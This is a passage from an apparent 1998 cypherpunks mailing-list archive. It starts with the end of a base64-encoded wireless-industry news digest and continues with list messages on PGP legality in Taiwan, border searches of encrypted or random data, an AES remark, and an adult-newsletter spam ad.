ZHRsIj5TQU4KRlJBTkNJU0NPIEVYQU1JTkVSPC9BPik8L0ZPTlQ+PC9URD4K
CjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48QlI+PC9U
RD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48
Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+VGV4
YXMgSW5zdHJ1bWVudHMgQW5ub3VuY2VzCk5ldyBUZWNobm9sb2d5IEJhc2Vk
Jm5ic3A7PEJSPgpvbiBUaW55IFRyYW5zaXN0b3JzPC9GT05UPjwvRk9OVD48
L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxU
RD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPldpcmVsZXNzIHRlbGVw
aG9uZXMgd2lsbCBiZSBhYmxlIHRvIGhhbmRsZQpkYXRhIGFuZCB2aWRlbyBh
cyB3ZWxsIGFzIHZvaWNlLiBUaGUgY2hpcHMgZmVhdHVyZSBhbiBlZmZlY3Rp
dmUgY2hhbm5lbApsZW5ndGggLSB0aGUgd29ya2luZyBwYXJ0IGluc2lkZSBh
IHRyYW5zaXN0b3IgLSBvZiAuMDcgbWljcm9uLCB3aGljaCBpcwoxLDAwMCB0
aW1lcyB0aGlubmVyIHRoYW4gYSBodW1hbiBoYWlyLiBUaGV5IGFyZSBkZXNp
Z25lZCBmb3IgYW5hbG9nIGFuZApkaWdpdGFsIG9wZXJhdGlvbnMuICg8QSBI
UkVGPSJodHRwOi8vd3d3LmJvc3Rvbi5jb20vZGFpbHluZXdzL3dpcmVodG1s
LzIzOC9UZXhhc19JbnN0cnVtZW50c19hbm5vdW5jZXNfbmV3X3RlYy5zaHRt
bCI+Qk9TVE9OCkdMT0JFPC9BPikgLSAoPEEgSFJFRj0iaHR0cDovL2RhaWx5
bmV3cy55YWhvby5jb20vaGVhZGxpbmVzL3RjL3N0b3J5Lmh0bWw/cz12L25t
LzE5OTgwODI3L3RjL3RpXzEuaHRtbCI+WUFIT088L0E+KQotICg8QSBIUkVG
PSJodHRwOi8vd3d3Lm5ld3NieXRlcy5jb20vcHViTmV3cy8xMTcwOTIuaHRt
bCI+TkVXU0JZVEVTPC9BPikKLSAoPEEgSFJFRj0iaHR0cDovL3d3dy51c2F0
b2RheS5jb20vbGlmZS9jeWJlci90ZWNoL2N0ZDM1Mi5odG0iPlVTQSBUT0RB
WTwvQT4pCi0gKDxBIEhSRUY9Imh0dHA6Ly93d3cubWVyY3VyeWNlbnRlci5j
b20vYnVzaW5lc3MvdG9wLzA3NDgyMy5odG0iPlNBTiBKT1NFCk1FUkNVUlkg
TkVXUzwvQT4pPC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4K
PFREPjwvVEQ+Cgo8VEQ+PEJSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxU
Uj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0
aWNhIj48Rk9OVCBTSVpFPSsxPldpblN0YXIgRXhwYW5kcyBTd2l0Y2hlZApT
ZXJ2aWNlcyB0byBDb2x1bWJ1cywgS2Fuc2FzIENpdHkgYW5kIE1pbm5lYXBv
bGlzPC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoK
PFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRp
Y2EiPldpblN0YXIgaXMgb24gc2NoZWR1bGUgdG8gZGVwbG95IGl0cyB0ZWxl
Y29tbXVuaWNhdGlvbnMKbmV0d29yayBpbiB0aGUgdG9wIDMwIFUuUy4gbWFy
a2V0cyBieSB0aGUgZW5kIG9mIHRoZSB5ZWFyIGFuZCBoYXMgdGFyZ2V0ZWQK
dGhyZWUgYWRkaXRpb25hbCBtYXJrZXRzIGZvciB0aGUgaW50cm9kdWN0aW9u
IG9mIHN3aXRjaGVkIHNlcnZpY2VzOiBNaWFtaSwKU3QuIExvdWlzLCBhbmQg
Q2xldmVsYW5kLiAoPEEgSFJFRj0iaHR0cDovL2Jpei55YWhvby5jb20vYncv
OTgwODI3L3dpbnN0YXJfMi5odG1sIj5ZQUhPTzwvQT4pPC9GT05UPjwvVEQ+
Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEJSPjwv
VEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+
PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPkNo
aWNhZ28gQXJlYSBTY2hvb2wgRGlzdHJpY3QKV2lucyBHcmFudCBmb3IgV2ly
ZWxlc3MgVGVjaG5vbG9neSBMYWJvcmF0b3J5PC9GT05UPjwvRk9OVD48L0I+
PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48
Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPkNvbW11bml0eSBVbml0IFNj
aG9vbCBEaXN0cmljdCAzMDAgaGFzCmJlZW4gYXdhcmRlZCBhICQyMjUsMDAw
IGNvbXBldGl0aXZlIHRlY2hub2xvZ3kgZ3JhbnQgZnJvbSB0aGUgSWxsaW5v
aXMKU3RhdGUgQm9hcmQgb2YgRWR1Y2F0aW9uIHRvIGJ1eSBjb21wdXRlciBl
cXVpcG1lbnQgYW5kIGVzdGFibGlzaCBhIHdpcmVsZXNzLXRlY2hub2xvZ3kK
bGFib3JhdG9yeS4gKDxBIEhSRUY9Imh0dHA6Ly9jaGljYWdvdHJpYnVuZS5j
b20vc3BsYXNoL2FydGljbGUvMCwxMDUxLFNBVi05ODA4MjYwMzAwLDAwLmh0
bWwiPkNISUNBR08KVFJJQlVORTwvQT4pPC9GT05UPjwvVEQ+Cgo8VEQ+PC9U
RD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEJSPjwvVEQ+Cgo8VEQ+
PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFD
RT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPk5ZU0VSREEgQXdh
cmRzIENvbnRyYWN0CnRvIENhbHNwYW4gdG8gRGV2ZWxvcCBTeXN0ZW0mbmJz
cDs8QlI+CnRvIEltcHJvdmUgVHJ1Y2sgU2FmZXR5IGFuZCBGbGVldCBNYW5h
Z2VtZW50PC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8L1RS
PgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2
ZXRpY2EiPlRoZSBOZXcgWW9yayBTdGF0ZSBFbmVyZ3kgUmVzZWFyY2ggYW5k
CkRldmVsb3BtZW50IEF1dGhvcml0eSAoTllTRVJEQSkgYXdhcmRlZCBDYWxz
cGFuLCBhbiBvcGVyYXRpb24gb2YgVmVyaWRpYW4sCmEgcmVzZWFyY2ggY29u
dHJhY3Qgd29ydGggJDE0MSwwMDAgdG8gZGV2ZWxvcCBhbmQgZGVtb25zdHJh
dGUgYSB0ZWNobm9sb2d5CmZvciBvbi1ib2FyZCwgcmVhbC10aW1lIG1vbml0
b3JpbmcgYW5kIHJlcG9ydGluZyBvZiBzYWZldHkgc3lzdGVtcyBmb3IKdHJ1
Y2tzLiZuYnNwOyBDb21tZXJjaWFsIHRydWNrcyB3aWxsIGJlIGVxdWlwcGVk
IHdpdGggYSBjb21tdW5pY2F0aW9ucwpkZXZpY2UgY2FwYWJsZSBvZiBtb25p
dG9yaW5nIHRoZSBwZXJmb3JtYW5jZSBvZiBzeXN0ZW1zIHN1Y2ggYXMgYnJh
a2VzCmFuZCBzdGVlcmluZyB0byBkZXRlcm1pbmUgd2hlbiB0aG9zZSBzeXN0
ZW1zIG5lZWQgcmVwYWlyIG9yIHJlcGxhY2VtZW50LiZuYnNwOwooPEEgSFJF
Rj0iaHR0cDovL3d3dy53b3ctY29tLmNvbS9yZXN1bHRzL3Byb2Zlc3Npb25h
bC9uZXdzL2ZyYW1laW5kZXguY2ZtP2FydGljbGVpZD0zMzM5Ij5XT1ctQ09N
PC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+
PC9URD4KCjxURD48QlI+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8
VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2Ei
PjxGT05UIFNJWkU9KzE+TW9udGFuYSBXb3JrZXJzIE1heSBTdHJpa2UKVSBT
IFdFU1Q8L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFREPjwvVEQ+CjwvVFI+
Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZl
dGljYSI+SW4gTW9udGFuYSwgVSBTIFdFU1QgYW5kIHRoZSBJbnRlcm5hdGlv
bmFsCkJyb3RoZXJob29kIG9mIEVsZWN0cmljYWwgV29ya2VycyByZW1haW4g
YXQgb2RkcyBvdmVyIHdhZ2VzLCBwZW5zaW9ucywKaGVhbHRoLWNhcmUgYmVu
ZWZpdHMgYW5kIGEgY29tcGFueSBwbGFuIHRvIGluc3RhbGwgYSBwZXJmb3Jt
YW5jZS1iYXNlZApwYXkgcGxhbiBmb3IgYWJvdXQgMTY1IGZpZWxkIHRlY2hu
aWNpYW5zLiAoPEEgSFJFRj0iaHR0cDovL3d3dy5kZW52ZXJwb3N0LmNvbS9i
dXNpbmVzcy9iaXowODI3Lmh0bSI+REVOVkVSClBPU1Q8L0E+KTwvRk9OVD48
L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxC
Uj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFRE
PjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0r
MT5UZWx4b24sIFd5c2VyLVByYXR0ZQpNYXJrIEFncmVlbWVudCB0byBFbmQg
TGF3c3VpdHM8L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFREPjwvVEQ+Cjwv
VFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhl
bHZldGljYSI+VGVseG9uLCBhIG1ha2VyIG9mIGhhbmQtaGVsZCBjb21wdXRl
cnMKYW5kIG1vYmlsZSBpbmZvcm1hdGlvbiBkZXZpY2VzLCBhZ3JlZWQgdG8g
Y29uc2lkZXIgZnV0dXJlIHRha2VvdmVyIGJpZHMKaW4gZXhjaGFuZ2UgZm9y
IHNoYXJlaG9sZGVyIEd1eSBXeXNlci1QcmF0dGUncyBhZ3JlZW1lbnQgdG8g
ZHJvcCBwcm9wb3NhbHMKdG8gYW1lbmQgdGhlIGNvbXBhbnkncyBieS1sYXdz
LiAoPEEgSFJFRj0iaHR0cDovL2Jpei55YWhvby5jb20vZmluYW5jZS85ODA4
MjYvY29tcHV0ZXJzX185Lmh0bWwiPllBSE9PPC9BPik8L0ZPTlQ+PC9URD4K
CjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48QlI+PC9U
RD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48
Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+TW9i
aWxlIFBob25lcyBEaXNhYmxlZApCeSBKYW1taW5nIERldmljZXM8L0ZPTlQ+
PC9GT05UPjwvQj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48
L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+SmFwYW5l
c2UgZmlybSwgTWVkaWMsIG9uZSBvZiB0aGUgZmlyc3QKY29tcGFuaWVzIHRv
IG1hcmtldCBzbWFsbC1yYW5nZSBqYW1tZXJzIGZvciBwcml2YXRlIHVzZSwg
bWFya2V0cyBhIGRldmljZQpjYWxsZWQgV2F2ZSBXYWxsLCB3aGljaCBzZW5k
cyBvdXQgcG93ZXJmdWwgc2lnbmFscyBvbiB0aGUgc2FtZSBmcmVxdWVuY2ll
cwphcyB0aG9zZSB1c2VkIGZvciBib3RoIGluY29taW5nIGFuZCBvdXRnb2lu
ZyBjYWxscywgcmVuZGVyaW5nIG1vYmlsZSBwaG9uZXMKbXV0ZS4mbmJzcDsg
Tm8gY2FsbHMgY2FuIGJlIG1hZGUgb3IgcmVjZWl2ZWQuJm5ic3A7IFRoZSBj
b21wYW55IGhhcyBzb2xkCjYsMDAwIG9mIHRoZSBkZXZpY2VzLiAoPEEgSFJF
Rj0iaHR0cDovL3d3dy50ZWNoc2VydmVyLmNvbS9uZXdzcm9vbS9udG4vaW5m
by8wODI2OTgvaW5mbzZfMjQ3ODZfbm9mcmFtZXMuaHRtbCI+TkFORE8KTkVU
PC9BPikgLSAoPEEgSFJFRj0iaHR0cDovL3d3dy5hYmNuZXdzLmNvbS9zZWN0
aW9ucy90ZWNoL0RhaWx5TmV3cy9waG9uZWphbW1pbmc5ODA4MjYuaHRtbCI+
QUJDCk5FV1M8L0E+KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8
VFI+CjxURD48L1REPgoKPFREPjxCUj48L1REPgoKPFREPjwvVEQ+CjwvVFI+
Cgo8VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhl
bHZldGljYSI+PEZPTlQgU0laRT0rMT5NaWNyb3NvZnQgQ2hhbGxlbmdlcwpQ
YWxtUGlsb3Qgd2l0aCBDaGluZXNlIFByb2R1Y3Q8L0ZPTlQ+PC9GT05UPjwv
Qj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFRE
PjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+TWljcm9zb2Z0IHdpbGwg
bGF1bmNoIGEgQ2hpbmVzZSB2ZXJzaW9uCm9mIFdpbmRvd3MgQ0UgbGF0ZXIg
dGhpcyB5ZWFyIGluIGFuIGVmZm9ydCB0byBwcmVlbXB0IHRoZSBlbnRyeSBv
ZiB0aGUKUGFsbVBpbG90IGludG8gQ2hpbmEncyBoYW5kLWhlbGQgY29tcHV0
aW5nIG1hcmtldC4gTWljcm9zb2Z0J3MgcmVsZWFzZQpvZiB0aGUgc2Vjb25k
IHZlcnNpb24gb2YgV2luZG93cyBDRSBoYXMgdHVybmVkIHVwIHRoZSBoZWF0
IG9uIGhhbmRoZWxkCm1hcmtldCBsZWFkZXIgM0NvbSBDb3JwLCB3aGljaCBo
YXMgc29sZCBzb21lIHR3byBtaWxsaW9uIG9mIGl0cyBQYWxtUGlsb3QKY29t
cHV0ZXJzIGluIHRoZSBVbml0ZWQgU3RhdGVzIGFuZCBFdXJvcGUuICg8QSBI
UkVGPSJodHRwOi8vZGFpbHluZXdzLnlhaG9vLmNvbS9oZWFkbGluZXMvd3Iv
c3RvcnkuaHRtbD9zPXYvbm0vMTk5ODA4Mjcvd3IvbWljcm9zb2Z0XzMuaHRt
bCI+WUFIT088L0E+KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8
VFI+CjxURD48L1REPgoKPFREPjxCUj48L1REPgoKPFREPjwvVEQ+CjwvVFI+
Cgo8VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhl
bHZldGljYSI+PEZPTlQgU0laRT0rMT5WaW1wZWxDb20gUmVwb3J0cyA2MCUK
SW5jcmVhc2UgaW4gRUJJVERBIGZvciAybmQgUXVhcnRlciAxOTk4PC9GT05U
PjwvRk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+
PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPlZpbXBl
bENvbSBpcyB0aGUgbGFyZ2VzdCBwcm92aWRlciBvZiBjZWxsdWxhcgp0ZWxl
Y29tbXVuaWNhdGlvbnMgaW4gUnVzc2lhLiAoPEEgSFJFRj0iaHR0cDovL2Jp
ei55YWhvby5jb20vcHJuZXdzLzk4MDgyNy9ueV92aW1wZWxjXzEuaHRtbCI+
WUFIT088L0E+KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+
CjxURD48L1REPgoKPFREPjxCUj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8
VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZl
dGljYSI+PEZPTlQgU0laRT0rMT5BTEFDRUwgQW5ub3VuY2VzIFdvcmtzaG9w
Cm9uIFByZS1QYWlkIENlbGx1bGFyIFNlcnZpY2U8L0ZPTlQ+PC9GT05UPjwv
Qj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFRE
PjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+SW4gb3JkZXIgdG8gcHJv
bW90ZSB0aGUgZ3Jvd3RoIGFuZCBkZXZlbG9wbWVudApvZiB3aXJlbGVzcyBj
b21tdW5pY2F0aW9uIHN5c3RlbXMgaW4gTGF0aW4gQW1lcmljYSAtIEFMQUNF
TCwgdGhlIExhdGluCkFtZXJpY2FuIFdpcmVsZXNzIEluZHVzdHJ5IEFzc29j
aWF0aW9uLCBoYXMgYW5ub3VuY2VkIGl0cyBmaXJzdCB3b3Jrc2hvcApvbiBw
cmUtcGFpZCBjZWxsdWxhciBzZXJ2aWNlLCBTZXB0ZW1iZXIgMjgtMjksIE1p
YW1pIEJlYWNoLCBGbG9yaWRhIGF0CnRoZSBGb3VudGFpbmVibGVhdSBIaWx0
b24gSG90ZWwuJm5ic3A7IFBhcnRpY2lwYXRpbmcgY29tcGFuaWVzIGluY2x1
ZGU6CkNUSSwgQXJnZW50aW5hOyBNb3ZpY29tLCBBcmdlbnRpbmE7IFRlbGUg
MjAwMCwgUGVydTsgVGVsY2VsLCBWZW5lenVlbGE7CkdydXBvIEl1c2FjZWxs
LCBNZXhpY287IENlbHVtJm9hY3V0ZTt2aWwsIENvbG9tYmlhOyBCZWxsU291
dGgsIENoaWxlOyBUZWxlZiZvYWN1dGU7bmljYQpkZWwgUGVyJnVhY3V0ZTss
IFBlciZ1YWN1dGU7OyBUcmljb20sIFJlcC4gRG9taW5pY2FuYTsgQ29uZWNl
bCwgRWN1YWRvcjsKYW5kIElUICZhbXA7IFMsIEJyYXppbC4gKDxBIEhSRUY9
Imh0dHA6Ly93d3cuYWxhY2VsLmNvbS93b3Jrc2hvcC5odG1sIj5BTEFDRUw8
L0E+KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48
L1REPgoKPFREPgo8SFIgV0lEVEg9IjEwMCUiPjwvVEQ+Cgo8VEQ+PC9URD4K
PC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWws
SGVsdmV0aWNhIj48Rk9OVCBTSVpFPS0xPkZvciBhZGRpdGlvbmFsIG5ld3Mg
YWJvdXQKdGhlIHdpcmVsZXNzIGluZHVzdHJ5LS1pbmNsdWRpbmcgcGVyaW9k
aWMgbmV3cyB1cGRhdGVzIHRocm91Z2hvdXQgdGhlIGRheS0tdmlzaXQKPEEg
SFJFRj0iaHR0cDovL3d3dy53b3ctY29tLmNvbSI+aHR0cDovL3d3dy53b3ct
Y29tLmNvbS48L0E+PC9GT05UPjwvRk9OVD48L1REPgoKPFREPjwvVEQ+Cjwv
VFI+Cgo8VFI+CjxURD48L1REPgoKPFREPgo8SFIgV0lEVEg9IjEwMCUiPjwv
VEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZP
TlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPS0xPkNUSUEg
RGFpbHkgTmV3cyBmcm9tIFdPVy1DT00KaXMgdHJhbnNtaXR0ZWQgd2Vla2Rh
eXMsIGV4Y2VwdCBmb3IgaG9saWRheXMuIFZpc2l0IHVzIG9uIHRoZSBXb3Js
ZCBXaWRlCldlYiBhdCA8QSBIUkVGPSJodHRwOi8vd3d3Lndvdy1jb20uY29t
L3Byb2Zlc3Npb25hbCI+aHR0cDovL3d3dy53b3ctY29tLmNvbS9wcm9mZXNz
aW9uYWw8L0E+LiZuYnNwOzwvRk9OVD48L0ZPTlQ+Jm5ic3A7Cgo8UD48Rk9O
VCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9LTE+SWYgeW91
IGFyZSBub3QgaW50ZXJlc3RlZAppbiByZWNlaXZpbmcgdGhlIENUSUEgRGFp
bHkgTmV3cyBmcm9tIFdPVy1DT00sIHBsZWFzZSBzZW5kIGEgbWVzc2FnZSB0
bwo8QSBIUkVGPSJtYWlsdG86dW5qb2luLUNUSUFfRGFpbHlfTmV3c0B1bTIu
dW5pdHltYWlsLmNvbSI+dW5qb2luLUNUSUFfRGFpbHlfTmV3c0B1bTIudW5p
dHltYWlsLmNvbTwvQT4uJm5ic3A7PC9GT05UPjwvRk9OVD4mbmJzcDsKCjxQ
PjxCPioqKjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0la
RT0tMT4gVGhlIHRlcm0gInVuam9pbi1DVElBX0RhaWx5X05ld3NAdW0yLnVu
aXR5bWFpbC5jb20iCm11c3QgYmUgbGlzdGVkIGluIHRoZSBUTyBzZWN0aW9u
IG9mIHRoZSBlbWFpbC48L0ZPTlQ+PC9GT05UPiAqKio8L0I+Jm5ic3A7Cgo8
UD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9LTE+
UGxlYXNlIE5vdGU6IFNvbWUgb2YgdGhlCmxpbmtzIGluIHRvZGF5J3MgbmV3
cyBhcmUgdGltZSBzZW5zaXRpdmUuJm5ic3A7IFRob3NlIGxpbmtzIG1heSBu
b3QgYmUKYXZhaWxhYmxlIGFzIG5ld3MgY2hhbmdlcyB0aHJvdWdob3V0IHRo
ZSBkYXkuJm5ic3A7IEFsc28sIHNvbWUgbmV3cyBzb3VyY2VzCm1heSBiZSBz
dWJzY3JpcHRpb24tYmFzZWQgb3IgcmVxdWlyZSByZWdpc3RyYXRpb24uPC9G
T05UPjwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48
L1REPgoKPFREPgo8SFIgV0lEVEg9IjEwMCUiPjwvVEQ+Cgo8VEQ+PC9URD4K
PC9UUj4KPC9UQUJMRT4KJm5ic3A7PC9DRU5URVI+CjwvQk9EWT4KPC9IVE1M
Pgo=
--Boundary..3995.1071713796.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stan@net.com (Stan Heller)
Date: Thu, 27 Aug 1998 14:44:45 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Crypto law in Taiwan
Message-ID: <199808272147.OAA03344@shakespeare.net.com>
MIME-Version: 1.0
Content-Type: text/plain



Hello,

I was referred to you by Bert-Jaap Koops regarding some
advice on the legality of using PGP in Taiwan. I would 
be interested if someone knows what the law is and whether
there is preferred version of PGP ( the international version
I assume) that I should you. 

Any information you might have in this regard would be 
appreciated.


				=stan

Stan Heller		stan@net.com
Senior Systems Administrator
Network Equipment Technologies
(510) 574-2514





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED NEWS DAILY <stuffed@stuffed.net>
Date: Thu, 27 Aug 1998 20:30:48 -0700 (PDT)
To: (STUFFED THURSDAY AUGUST 27 1998)
Subject: Man with a permanent lump in his pants/OVER 20 FREE HI-RES JPG PHOTOS
Message-ID: <19980827180935.2168.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


We continue as we mean to go on with 20+ hot, hi-res photos...

+ HOT 'N' SEXY STORIES
+ FACTUAL SEX GUIDES (VERY USEFUL INFO)
+ OUTRAGEOUSLY FUNNY AND SEXY STORIES
+ *YOUR* TRUE SEX SECRETS YOU'VE BEEN SENDING US (HOT!)
+ LOADS & LOADS MORE SEXY STUFF!

       ---->   http://stuffed.net/98/8/27/   <----

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL above.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the URL,  copy it and then paste it into your browser  (then
press Return).

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/98/8/27/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Thu, 27 Aug 1998 18:21:44 -0700 (PDT)
To: abumujahid@taliban.com
Subject: careful reading
Message-ID: <35E604E3.52CB@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Thursday 8/27/98 7:08 PM

Charles R Smith http://www.us.net/softwar/

I am reading http://www.us.net/softwar/plight.html

hardcopy REAL CAREFULLY.  With a yellow highligher.

Goal is to help each other out. 

I think I see some problems, but nothing FATAL.

I think I see some FATAL deficiencies at

ht.//csrc.nist.gov/encryption/aes/round1/docs.htm

So let's all continue to THINK.  And help EACH OTHER.

bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dutra de Lacerda <dulac@ip.pt>
Date: Thu, 27 Aug 1998 12:05:21 -0700 (PDT)
To: Xcott Craver <caj@math.niu.edu>
Subject: Re: McCarthy return under new clothes
In-Reply-To: <19980827064602846@nomvs.lsumc.edu>
Message-ID: <199808271904.UAA01733@mail2.ip.pt>
MIME-Version: 1.0
Content-Type: text/plain


At Thursday, you wrote:
> Are you sure there was nothing that could be construed as pornographic
> on your PC?  Nothing in the cache?  Nothing deleted but not overwritten?
> Nothing hiding in the unused space as the end of a sector?  Have you
> never accessed a page only to find it contains pornography (or an ad for
> the same)?

I feel the puzzling question will be: 
	Is the information one's carry in one's head much different
	from the info on a disk?!? It is certainly smaller, but much
	more powerful. 
Besides: This question reflects the absurdity of the actual search 
	for 'virtual crimes'... and will these 'virtual crimes' have
	'virtual punishments'? To this last question the answer is NO.
	The schizoid trend is to treat virtuality as real thing.

	
>	And how about random noise?  Random strings could be ciphertext.
>	If I design PRNGs, and have my laptop drive stuffed with huge
>	random files for DIEHARD analysis, would that one day be 
>	illegal to carry across a border?

No one knows were social insanity, as this, will lead us.
It's starting to have some similarities with the 'Witches Hunt'
in the Middle Ages though. The volume of people using technology
without its understanding of it implications is greater then ever.
Specially in the political population. I subscribe the analysis 
that human kind is NOT rational but 'guts' orientated. 
What the result will be in the long term is uncertain.

I guess all attempts to drive this kind of new beast will fail in
the long run. People needed 2000 years to build a civilization.
The last 50 years are destroying all the cultural links to this
past. What will happen may, most probably, be the disruption of
society as we know it... And all started with the economics 
becoming the #1 motor of societies instead of subordinated to
'quality of life'. 


> From an information-theoretic perspective, we have the asymptotic
> equipartition property telling us that almost all strings are almost 
> equally extremely suspicious.  Will a dartboard w/ the alphabet on it
> be vanishingly unlikely to generate a message one could legally
> carry outside the US?

Again the Brain/Disk paradox. Perhaps a brain has no political useful
information... That would be a change in past events i don't believe.

There's a significant pattern in this strange behavior:
	Absence of sense and contradictory aspects.
These are dangerous generators of errors in ones comprehension.
So its easy to predict a lot of confusion in the future. Specially 
to future generations that did not lived past values. 

Time will tell.

DuLac.

P.S. - I do not subscribe the notion that 'ideas' drive the world.
	A reason for this is that we humans make a complex body of
	iterations and are emotional creatures. Not rational ones.
       This moves the center of the problem to 'culture', as ones
	terrain of conduct, and to personality of leaders, as they 
	are the 'usual conduct' main changers. 

	Hitler would, today and again, get himself elected but this 
 	time with a greatly modified strategy:  He would be kissing 
	children and talking about Peace, the New Words people like 
	to hear.  This leads to the question:  How many new Hitlers 
	have we elected in the last years?   And how to distinguish 
	them from honest citizens? TIP: Honest citizens rarely have 
	the ability to use dirty tricks and get themselves elected.
	
<End-Of-Msg>

 - - - 
Antonio Manuel Melo de Carvalho Dutra de Lacerda
Morada		: Rua Rodrigues Cabrilho, 5 - 5 Esq.
		  1400 Lisboa, PORTUGAL
Telefone	: +351-(1)-3013579
FAX & BBS	: +351-(1)-3021098




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wm. Michael Denney" <gomez0@pacbell.net>
Date: Fri, 28 Aug 1998 00:29:22 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Cafe Gulag
Message-ID: <35E655C4.C7C0037F@pacbell.net>
MIME-Version: 1.0
Content-Type: text/plain


Msg for Jim Choate...

Contact Larry Joe Dowling at 512-892-3393.


from TOTO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Interstate 95 <I95@nym.alias.net>
Date: Thu, 27 Aug 1998 17:42:01 -0700 (PDT)
To: <wklink@yahoo.com>
Subject: Re: Hate Code in Unix
Message-ID: <19980828004151.18389.qmail@nym.alias.net>
MIME-Version: 1.0
Content-Type: text/plain


